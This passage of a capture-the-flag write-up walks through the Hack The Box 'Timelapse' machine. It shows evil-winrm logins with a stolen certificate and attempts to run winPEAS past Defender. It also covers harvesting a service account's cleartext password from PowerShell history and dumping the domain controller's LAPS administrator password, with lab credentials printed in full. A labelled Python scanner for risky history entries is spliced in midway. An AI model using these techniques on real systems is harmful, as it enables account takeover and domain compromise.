Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: Useless cert/s provided, SSL is not enabled
Info: Establishing connection to remote endpoint
^C
Warning: Press "y" to exit, press any other key to continue
Info: Exiting...
After looking online, it turns out we have to pass -S to force SSL, so we run the initial command with -S:
evil-winrm -S -i 10.10.11.152 -u legaccy -c /home/kali/HTB/timelapse/certificate.crt -k /home/kali/HTB/timelapse/privatekey.pem
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ evil-winrm -S -i 10.10.11.152 -u legaccy -c /home/kali/HTB/timelapse/certificate.crt -k /home/kali/HTB/timelapse/privatekey.pem
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents>
and we are in!!!
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ../
*Evil-WinRM* PS C:\Users\legacyy> ls
Directory: C:\Users\legacyy
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 10/25/2021 8:25 AM Desktop
d-r--- 10/25/2021 8:22 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
*Evil-WinRM* PS C:\Users\legacyy> cd Desktop
*Evil-WinRM* PS C:\Users\legacyy\Desktop> ls
Directory: C:\Users\legacyy\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/14/2023 1:08 PM 34 user.txt
*Evil-WinRM* PS C:\Users\legacyy\Desktop> cat user.txt
b4d108259211b472c1f480aecdaf68d4
Privesc
We will try to load the PowerShell module we saw earlier in the extracted MSI:
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ cd WindowsPowershell
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell]
└─$ ls
v1.0
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell]
└─$ cd v1.0
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell/v1.0]
└─$ ls
Modules
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell/v1.0]
└─$ cd Modules
┌──(kali㉿kali)-[~/…/timelapse/WindowsPowershell/v1.0/Modules]
└─$ ls
AdmPwd.PS
┌──(kali㉿kali)-[~/…/timelapse/WindowsPowershell/v1.0/Modules]
└─$ cd AdmPwd.PS
┌──(kali㉿kali)-[~/…/WindowsPowershell/v1.0/Modules/AdmPwd.PS]
└─$ ls
AdmPwd.PS.dll AdmPwd.PS.format.ps1xml AdmPwd.PS.psd1 AdmPwd.Utils.dll en-US
┌──(kali㉿kali)-[~/…/WindowsPowershell/v1.0/Modules/AdmPwd.PS]
└─$
We upload the directory to the Windows machine:
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> upload /home/kali/HTB/timelapse/AdmPwd.PS
Info: Uploading /home/kali/HTB/timelapse/AdmPwd.PS to C:\Users\legacyy\Documents\AdmPwd.PS
Data: 42372 bytes of 42372 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls
Directory: C:\Users\legacyy\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/14/2023 4:03 PM AdmPwd.PS
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd AAdmPwd.PS
Cannot find path 'C:\Users\legacyy\Documents\AAdmPwd.PS' because it does not exist.
At line:1 char:1
+ cd AAdmPwd.PS
+ ~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\legacyy\Documents\AAdmPwd.PS:String) [Set-Location], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetLocationCommand
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd AdmPwd.PS
Output:
└─$ evil-winrm -S -i 10.10.11.152 -u legaccy -c /home/kali/HTB/timelapse/certificate.crt -k /home/kali/HTB/timelapse/privatekey.pem
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls
Directory: C:\Users\legacyy\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/14/2023 4:03 PM AdmPwd.PS
*Evil-WinRM* PS C:\Users\legacyy\Documents> Import-Module C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.PS.psd1
*Evil-WinRM* PS C:\Users\legacyy\Documents>
*Evil-WinRM* PS C:\Users\legacyy\Documents> Get-Content AdmPwd.PS.psd1
Cannot find path 'C:\Users\legacyy\Documents\AdmPwd.PS.psd1' because it does not exist.
At line:1 char:1
+ Get-Content AdmPwd.PS.psd1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\legacy...\AdmPwd.PS.psd1:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\legacyy\Documents> [Reflection.Assembly]::LoadFile("C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.PS.dll")
Enter PEM pass phrase:
Enter PEM pass phrase:
GAC Version Location
--- ------- --------
False v4.0.30319 C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.PS.dll
*Evil-WinRM* PS C:\Users\legacyy\Documents> [Reflection.Assembly]::LoadFile("C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.Utils.dll")
Enter PEM pass phrase:
GAC Version Location
--- ------- --------
False v4.0.30319 C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.Utils.dll
*Evil-WinRM* PS C:\Users\legacyy\Documents> Import-Module C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.PS.psd1
*Evil-WinRM* PS C:\Users\legacyy\Documents> Get-Content AdmPwd.PS.psd1
Enter PEM pass phrase:
Cannot find path 'C:\Users\legacyy\Documents\AdmPwd.PS.psd1' because it does not exist.
At line:1 char:1
+ Get-Content AdmPwd.PS.psd1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\legacy...\AdmPwd.PS.psd1:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\legacyy\Documents> Get-Content C:\Users\legacyy\Documents\AdmPwd.PS\AdmPwd.PS.psd1
Enter PEM pass phrase:
#
# Module manifest for module 'AdmPwd.PS'
#
# Generated by: Jiri Formacek - MSFT
#
# Generated on: 3.12.2012
#
@{
# Script module or binary module file associated with this manifest
ModuleToProcess = '.\AdmPwd.PS.dll'
# Version number of this module.
ModuleVersion = '5.0.0.0'
# ID used to uniquely identify this module
GUID = '11869C0C-4440-4560-AA89-9EEF0C0224FA'
# Author of this module
Author = 'Jiri Formacek - MSFT'
# Company or vendor of this module
CompanyName = 'Microsoft | Services'
# Copyright statement for this module
Copyright = ''
# Description of the functionality provided by this module
Description = 'Provides cmdlets for configuration and usage of Local admin password management solution'
# Minimum version of the Windows PowerShell engine required by this module
PowerShellVersion = ''
# Name of the Windows PowerShell host required by this module
PowerShellHostName = ''
# Minimum version of the Windows PowerShell host required by this module
PowerShellHostVersion = ''
# Minimum version of the .NET Framework required by this module
DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module
CLRVersion = ''
# Processor architecture (None, X86, Amd64, IA64) required by this module
ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @()
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = @()
# Script files (.ps1) that are run in the caller's environment prior to importing this module
ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
FormatsToProcess = @('AdmPwd.PS.format.ps1xml')
# Modules to import as nested modules of the module specified in ModuleToProcess
NestedModules = @()
# Functions to export from this module
FunctionsToExport = ''
# Cmdlets to export from this module
CmdletsToExport = '*'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module
AliasesToExport = '*'
# List of all modules packaged with this module
ModuleList = @()
# List of all files packaged with this module
FileList = @('AdmPwd.PS.dll','AdmPwd.Utils.dll','AdmPwd.PS.format.ps1xml')
# Private data to pass to the module specified in ModuleToProcess
PrivateData = ''
}
To list the available commands, as suggested by ChatGPT: Get-Command -Module 'AdmPwd.PS'
*Evil-WinRM* PS C:\Users\legacyy\Documents\AdmPwd.PS> Get-Command -Module 'AdmPwd.PS'
Enter PEM pass phrase:
CommandType Name Version Source
----------- ---- ------- ------
Cmdlet Find-AdmPwdExtendedRights 5.0.0.0 AdmPwd.PS
Cmdlet Get-AdmPwdPassword 5.0.0.0 AdmPwd.PS
Cmdlet Reset-AdmPwdPassword 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdAuditing 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdComputerSelfPermission 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdReadPasswordPermission 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdResetPasswordPermission 5.0.0.0 AdmPwd.PS
Cmdlet Update-AdmPwdADSchema 5.0.0.0 AdmPwd.PS
I will try to get the admin password: Get-AdmPwdPassword
But nothing happened.
Get-AdmPwdPassword -ComputerName DC01
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> Get-AdmPwdPassword -ComputerName DC01
Enter PEM pass phrase:
Enter PEM pass phrase:
ComputerName DistinguishedName Password ExpirationTimestamp
------------ ----------------- -------- -------------------
DC01 CN=DC01,OU=Domain Controllers,DC=timelapse... 9/19/2023 1:08:21 PM
*Evil-WinRM* PS C:\Users\legacyy\Documents>
No luck with this approach.
I will try to run winPEAS.
I upload and run it on the machine.
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ evil-winrm -S -i 10.10.11.152 -u legaccy -c /home/kali/HTB/timelapse/certificate.crt -k /home/kali/HTB/timelapse/
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplement
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> upload /home/kali/HTB/timelapse/winPEASx64.exe
Info: Uploading /home/kali/HTB/timelapse/winPEASx64.exe to C:\Users\legacyy\Documents\winPEASx64.exe
Enter PEM pass phrase:
Data: 3183956 bytes of 3183956 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\legacyy\Documents>
Running winPEAS, it looks like it's detected as a virus and gets deleted, so I upload it again.
*Evil-WinRM* PS C:\Users\legacyy\Documents> ./winPEASx64.exe
Enter PEM pass phrase:
Program 'winPEASx64.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted software.
At line:1 char:1
+ ./winPEASx64.exe
+ ~~~~~~~~~~~~~~~~
At line:1 char:1
+ ./winPEASx64.exe
+ ~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
*Evil-WinRM* PS C:\Users\legacyy\Documents> Set-ExecutionPolicy Bypass -Scope Process -Force
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> ./winPEASx64.exe
Enter PEM pass phrase:
The term './winPEASx64.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ ./winPEASx64.exe
+ ~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (./winPEASx64.exe:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\legacyy\Documents> Get-ChildItem -Path . -Filter winPEASx64.exe
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls
*Evil-WinRM* PS C:\Users\legacyy\Documents> upload winPEASx64.exe
Uploaded the winPEAS EXE and the PowerShell script Invoke-winPEAS.ps1.
┌──(kali㉿kali)-[~/Downloads/x64]
└─$ locate winPEAS
/home/kali/Downloads/winPEASx64.exe
/home/kali/Downloads/winPEASx86.exe
/home/kali/HTB/Sauna/winPEASx64.exe
/home/kali/HTB/timelapse/winPEASx64.exe
/usr/share/powershell-empire/empire/server/data/module_source/privesc/Invoke-winPEAS.ps1
/usr/share/powershell-empire/empire/server/modules/powershell/privesc/winPEAS.yaml
┌──(kali㉿kali)-[~/Downloads/x64]
└─$ cd /usr/share/powershell-empire/empire/server/data/module_source/privesc/
┌──(kali㉿kali)-[/usr/…/server/data/module_source/privesc]
└─$ cpInvoke-winPEAS.ps1 ~/HTB/timelapse
cpInvoke-winPEAS.ps1: command not found
┌──(kali㉿kali)-[/usr/…/server/data/module_source/privesc]
└─$ cp Invoke-winPEAS.ps1 ~/HTB/timelapse
┌──(kali㉿kali)-[/usr/…/server/data/module_source/privesc]
└─$
Will run the following steps:
Set-ExecutionPolicy Bypass -Scope Process -Force
. .\Invoke-winPEAS.ps1
Invoke-winPEAS
Getting blocked by antivirus again.
*Evil-WinRM* PS C:\Users\legacyy\Documents> Set-ExecutionPolicy Bypass -Scope Process -Force
*Evil-WinRM* PS C:\Users\legacyy\Documents> . .\Invoke-winPEAS.ps1
At C:\Users\legacyy\Documents\Invoke-winPEAS.ps1:1 char:1
+ function Invoke-winPEAS
+ ~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At C:\Users\legacyy\Documents\Invoke-winPEAS.ps1:1 char:1
+ function Invoke-winPEAS
+ ~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ParserError: (:) [], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls
Directory: C:\Users\legacyy\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/15/2023 4:56 AM 941879 Invoke-winPEAS.ps1
-a---- 9/15/2023 4:51 AM 2367796 winPEASx64.exe
*Evil-WinRM* PS C:\Users\legacyy\Documents> Invoke-winPEAS
The term 'Invoke-winPEAS' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ Invoke-winPEAS
+ ~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (Invoke-winPEAS:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\legacyy\Documents>
After research, I create a bat file with the following contents. Then we upload and run it on the computer where we have winPEAS.
└─$ cat runWinPEAS.bat
@echo off
powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File "C:\Users\legacyy\Documents\Invoke-winPEAS.ps1"
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$
This fails again after being detected as a virus.
*Evil-WinRM* PS C:\Users\legacyy\Documents> ;s
The term 's' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:2
+ ;s
+ ~
+ CategoryInfo : ObjectNotFound: (s:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls
Directory: C:\Users\legacyy\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/15/2023 4:56 AM 941879 Invoke-winPEAS.ps1
-a---- 9/15/2023 5:03 AM 134 runWinPEAS.bat
-a---- 9/15/2023 4:51 AM 2367796 winPEASx64.exe
*Evil-WinRM* PS C:\Users\legacyy\Documents> ./runWinPEAS.bat
runWinPEAS.bat : At C:\Users\legacyy\Documents\Invoke-winPEAS.ps1:1 char:1
+ CategoryInfo : NotSpecified: (At C:\Users\leg...AS.ps1:1 char:1:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
+ function Invoke-winPEAS
+ ~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
*Evil-WinRM* PS C:\Users\legacyy\Documents>
Downloaded winPEAS.bat from https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASbat
Uploaded it and tried to run it.
It ran and crashed, but not before giving us this output.
*Evil-WinRM* PS C:\Users\legacyy\Documents> ./winPEAS.bat
winPEAS.bat : The system cannot find the batch label specified - SetOnce
+ CategoryInfo : NotSpecified: (The system cann...ified - SetOnce:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
The system cannot find the batch label specified - ColorLine
The system cannot find the batch label specified - ColorLine
The system cannot find the batch label specified - ColorLine
PowerShell v2 Version:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
PowerShellVersion REG_SZ 2.0
PowerShell v5 Version:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine
PowerShellVersion REG_SZ 5.1.17763.1
Transcriptions Settings:
Module logging settings:
Scriptblog logging settings:
PS default transcript history
Checking PS history file
Volume in drive C has no label.
Volume Serial Number is 22CC-AE66
Directory of C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
03/04/2022 12:46 AM 434 ConsoleHost_history.txt
1 File(s) 434 bytes
0 Dir(s) 6,800,072,704 bytes free
The system cannot find the batch label specified - T_Progress
****** B A T C H R E C U R S I O N exceeds STACK limits ******
Recursion Count=344, Stack Usage=90 percent
****** B A T C H PROCESSING IS A B O R T E D
Interested in looking at ConsoleHost_history.txt, which is inside C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine. We go there and download the file.
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> ls
Directory: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/3/2022 11:46 PM 434 ConsoleHost_history.txt
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> download ConsoleHost_history.txt
Info: Downloading C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt to ConsoleHost_history.txt
Info: Download successful!
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>
We check this file.
└─$ cat ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$
Username svc_deploy and password E3R$Q62^12p7PLlC%KWaxuaV. I tried normal evil-winrm but had no luck, then tried with -S and got in.
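The history file above is exactly the kind of artifact a defender should be auditing: it holds a cleartext password, a credential object built for a service account, and session options that switch off certificate checks. As an added example (not code from the original writeup), here is a small Python scanner that flags those patterns in collected ConsoleHost_history.txt files; the sample history is constructed to mirror the one found on the box, with a placeholder password.

```python
"""Scan PowerShell PSReadLine history for credential-hygiene problems (added example, not from the writeup)."""
import re
from dataclasses import dataclass

# Constructed sample modelled on the history recovered in the writeup;
# the password here is a placeholder, not the real value.
SAMPLE_HISTORY = """whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'Constructed!Pass1' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
"""


@dataclass(frozen=True)
class Finding:
    line_no: int
    rule: str
    detail: str


def redact(secret: str) -> str:
    """Keep only the first character and the length so the report does not re-leak the secret."""
    if not secret:
        return "<empty>"
    return f"{secret[0]}{'*' * (len(secret) - 1)} (len={len(secret)})"

TLS_FLAG_RE = re.compile(r"-Skip(?:CA|CN|Revocation)Check", re.I)

# (rule name, regex, function mapping (match, line) to a human-readable detail)
RULES = [
    # A literal string fed to ConvertTo-SecureString -AsPlainText is a cleartext password.
    ("PLAINTEXT_SECRET",
     re.compile(r"""ConvertTo-SecureString\s+(['"])(.+?)\1.*-AsPlainText""", re.I),
     lambda m, line: f"literal secret passed to ConvertTo-SecureString: {redact(m.group(2))}"),
    # Building a PSCredential in an interactive session records which account was used.
    ("CREDENTIAL_OBJECT",
     re.compile(r"""PSCredential\s*\(\s*['"]?([^'",\s)]+)""", re.I),
     lambda m, line: f"PSCredential constructed for user '{m.group(1)}'"),
    # Session options that skip certificate checks make the WinRM TLS session interceptable.
    ("TLS_CHECK_BYPASS",
     TLS_FLAG_RE,
     lambda m, line: "certificate validation disabled: " + ", ".join(TLS_FLAG_RE.findall(line))),
]


def scan_history(text: str) -> list:
    """Return one Finding per (line, rule) hit, in file order."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for name, pattern, describe in RULES:
            match = pattern.search(line)
            if match:
                findings.append(Finding(line_no, name, describe(match, line)))
    return findings


if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f.line_no}: [{f.rule}] {f.detail}")
```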
└─$ evil-winrm -S -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
Going to try and upload the files I tried before with the other user.
Import-Module C:\Users\svc_deploy\Documents\AdmPwd.PS\AdmPwd.PS.psd1
*Evil-WinRM* PS C:\Users\svc_deploy\Documents\AdmPwd.PS> Get-Command -Module 'AdmPwd.PS'
CommandType Name Version Source
----------- ---- ------- ------
Cmdlet Find-AdmPwdExtendedRights 5.0.0.0 AdmPwd.PS
Cmdlet Get-AdmPwdPassword 5.0.0.0 AdmPwd.PS
Cmdlet Reset-AdmPwdPassword 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdAuditing 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdComputerSelfPermission 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdReadPasswordPermission 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdResetPasswordPermission 5.0.0.0 AdmPwd.PS
Cmdlet Update-AdmPwdADSchema 5.0.0.0 AdmPwd.PS
We run Get-AdmPwdPassword.
*Evil-WinRM* PS C:\Users\svc_deploy\Documents\AdmPwd.PS> Get-AdmPwdPassword -ComputerName DC01
ComputerName DistinguishedName Password ExpirationTimestamp
------------ ----------------- -------- -------------------
DC01 CN=DC01,OU=Domain Controllers,DC=timelapse... x6N4C+9O88}}#mN... 9/20/2023 3:40:41 AM
*Evil-WinRM* PS C:\Users\svc_deploy\Documents\AdmPwd.PS>
*Evil-WinRM* PS C:\Users\svc_deploy\Documents\AdmPwd.PS>
To get a better view, as this is truncated, we use Format-List: Get-AdmPwdPassword -ComputerName DC01 | Format-List
*Evil-WinRM* PS C:\Users\svc_deploy\Documents\AdmPwd.PS> Get-AdmPwdPassword -ComputerName DC01 | Format-List
ComputerName : DC01
DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
Password : x6N4C+9O88}}#mN4Tirl43/o
ExpirationTimestamp : 9/20/2023 3:40:41 AM
Will try to log in with these credentials: evil-winrm -S -i 10.10.11.152 -u administrator -p 'x6N4C+9O88}}#mN4Tirl43/o', remembering to use the -S switch. Tried without it and it didn't work; with it, it worked and we got root, but I can't find the root.txt file.
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ evil-winrm -S -i 10.10.11.152 -u administrator -p 'x6N4C+9O88}}#mN4Tirl43/o'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../
*Evil-WinRM* PS C:\Users\Administrator> ls
Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 10/23/2021 11:27 AM 3D Objects
d-r--- 10/23/2021 11:27 AM Contacts
d-r--- 3/3/2022 7:48 PM Desktop
d-r--- 10/23/2021 12:22 PM Documents
d-r--- 10/25/2021 2:06 PM Downloads
d-r--- 10/23/2021 11:27 AM Favorites
d-r--- 10/23/2021 11:28 AM Links
d-r--- 10/23/2021 11:27 AM Music
d-r--- 10/23/2021 11:27 AM Pictures
d-r--- 10/23/2021 11:27 AM Saved Games
d-r--- 10/23/2021 11:27 AM Searches
d-r--- 10/23/2021 11:27 AM Videos
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls -Recurse | ? { $_.Name -eq 'root.txt' }
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
I will restart the machine and try again. After rebooting I cannot connect again.
Will try to get the password again as it may have changed.
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ evil-winrm -S -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> upload AdmPwd.PS
Info: Uploading /home/kali/HTB/timelapse/AdmPwd.PS to C:\Users\svc_deploy\Documents\AdmPwd.PS
Data: 42372 bytes of 42372 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Import-Module C:\Users\svc_deploy\Documents\AdmPwd.PS\AdmPwd.PS.psd1
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-Command -Module 'AdmPwd.PS'
CommandType Name Version Source
----------- ---- ------- ------
Cmdlet Find-AdmPwdExtendedRights 5.0.0.0 AdmPwd.PS
Cmdlet Get-AdmPwdPassword 5.0.0.0 AdmPwd.PS
Cmdlet Reset-AdmPwdPassword 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdAuditing 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdComputerSelfPermission 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdReadPasswordPermission 5.0.0.0 AdmPwd.PS
Cmdlet Set-AdmPwdResetPasswordPermission 5.0.0.0 AdmPwd.PS
Cmdlet Update-AdmPwdADSchema 5.0.0.0 AdmPwd.PS
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-AdmPwdPassword -ComputerName DC01 | Format-List
ComputerName : DC01
DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
Password : I5wQ0fGrS}M;}xe+6KtQ5b3]
ExpirationTimestamp : 9/20/2023 6:06:08 AM
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
New password – I5wQ0fGrS}M;}xe+6KtQ5b3]
We connect again but cannot find the flag again.
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ evil-winrm -S -i 10.10.11.152 -u administrator -p 'I5wQ0fGrS}M;}xe+6KtQ5b3]'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
